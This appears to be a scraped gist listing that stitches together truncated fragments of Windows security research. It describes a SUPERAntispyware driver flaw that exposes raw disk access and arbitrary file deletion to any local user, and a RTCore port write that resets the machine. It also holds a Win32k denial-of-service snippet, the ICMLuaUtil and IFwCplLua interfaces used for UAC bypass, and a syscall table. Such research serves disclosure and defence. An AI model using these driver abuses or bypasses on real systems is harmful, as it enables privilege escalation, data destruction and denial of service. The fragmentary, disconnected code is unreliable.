| This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions. | |
| The SaskCallDriver function work with fixed size buffer send from user mode. | |
| This buffer is a structure defined as | |
| #pragma pack(push, 1) | |
| typedef struct _CALL_DRV { | |
| WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0 | |
| LARGE_INTEGER StartingOffset; | |
| SIZE_T DataSize; | |
| PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length. |
| __int64 __fastcall GetSystemWow64Directory2W(LPWSTR lpBuffer, ULONG Size, WORD ImageFileMachineType) | |
| { | |
| const UNICODE_STRING *usSystemDirectory; // rbx | |
| UINT sysDirLength; // ecx | |
| __int64 result; // rax | |
| unsigned int maxLength; // edx | |
| _UNICODE_STRING usQueryBuffer; // [rsp+20h] [rbp-18h] BYREF | |
| usQueryBuffer = 0i64; | |
| if ( Size > 0xFFFF ) |
| // Original source link https://twitter.com/hFireF0X/status/887930221466443776 | |
| // If you are here from any other link - do know that they just steal original info without giving any credit to source | |
| // This bug has been fixed in 16273 public build. | |
| #include "global.h" | |
| HINSTANCE g_hInstance; | |
| HANDLE g_ConOut = NULL; | |
| BOOL g_ConsoleOutput = FALSE; | |
| WCHAR g_BE = 0xFEFF; |
| #include <windows.h> | |
| #include <cstdio> | |
| typedef struct _RTCORE_WRITE_PORT_UCHAR { | |
| ULONG Port; | |
| ULONG Value; | |
| } RTCORE_WRITE_PORT_UCHAR, * PRTCORE_WRITE_PORT_UCHAR; | |
| #define KBRD_INTRFC 0x64 | |
| #define KBRD_RESET 0xFE |
| /* | |
| Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature. | |
| Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046). | |
| x86 versions not tested. | |
| Feature: |
| NtAcceptConnectPort 0 | |
| NtAccessCheck 1 | |
| NtAccessCheckAndAuditAlarm 2 | |
| NtAccessCheckByType 3 (STATUS_NOT_IMPLEMENTED) | |
| NtAccessCheckByTypeAndAuditAlarm 4 | |
| NtAccessCheckByTypeResultList 5 (STATUS_NOT_IMPLEMENTED) | |
| NtAccessCheckByTypeResultListAndAuditAlarm 6 | |
| NtAccessCheckByTypeResultListAndAuditAlarmByHandle 7 | |
| NtAddAtom 8 | |
| NtAddBootEntry 9 (STATUS_NOT_IMPLEMENTED) |
All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.
Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.
Wrapper around ZwQuerySystemInformation(SystemProcessInformation).
| typedef interface ICMLuaUtil ICMLuaUtil; | |
| typedef struct ICMLuaUtilVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in ICMLuaUtil * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef NTSTATUS(WINAPI* PFN_NtUserRegisterCoreMessagingEndPoint)( | |
| ULONG_PTR, ULONG_PTR, ULONG_PTR, ULONG_PTR | |
| ); | |
| int main(void) { | |
| HMODULE hUser32 = LoadLibrary(L"user32.dll"); |